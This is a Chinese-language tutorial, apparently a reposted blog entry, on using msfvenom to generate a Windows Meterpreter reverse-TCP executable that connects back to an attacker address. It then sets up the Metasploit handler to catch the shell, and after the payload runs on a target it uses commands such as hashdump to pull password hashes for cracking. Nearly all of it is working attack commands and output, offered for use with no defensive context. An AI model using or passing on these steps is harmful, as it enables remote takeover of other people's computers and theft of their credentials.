1. 程式人生 > WINDOWS開發 >msfvenom的shell在windows中的使用

msfvenom的shell在windows中的使用

msfvenom的shell在windows中的使用

msfvenom生成shell.exe

msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe

輸入命令:

msfconsole

metasploit偵聽

技術分享圖片
msf > use exploit/multi/handler     #載入模組
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp    #設定payload
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 上面的ip   #設定kali的ip
lhost => 123.123.123.123
msf exploit(multi/handler) > set lport 上面的埠   #設定kali的埠
lport => 2222
msf exploit(multi/handler) > exploit   #執行
[*] Started reverse TCP handler on 123.123.123.123:2222 
技術分享圖片

將生成的shell上傳至windows主機中並執行

提示有返回即可控制對方電腦,如同操作linux伺服器一樣

技術分享圖片

kill 後面跟shell端的程序id,如果加-s會結束該會話的程序

ifconfig和ipconfig 看ip

sysinfo 看系統資訊

技術分享圖片

ps 看程序(能看到shell.exe程序)

技術分享圖片

hashdump 可以dump出賬號口令的hash欄位,拿去cmd5解,這裡是為空

技術分享圖片

參考:

metasploit、msfvenom生成木馬入侵電腦及手機 - 秋夜雨巷 - 部落格園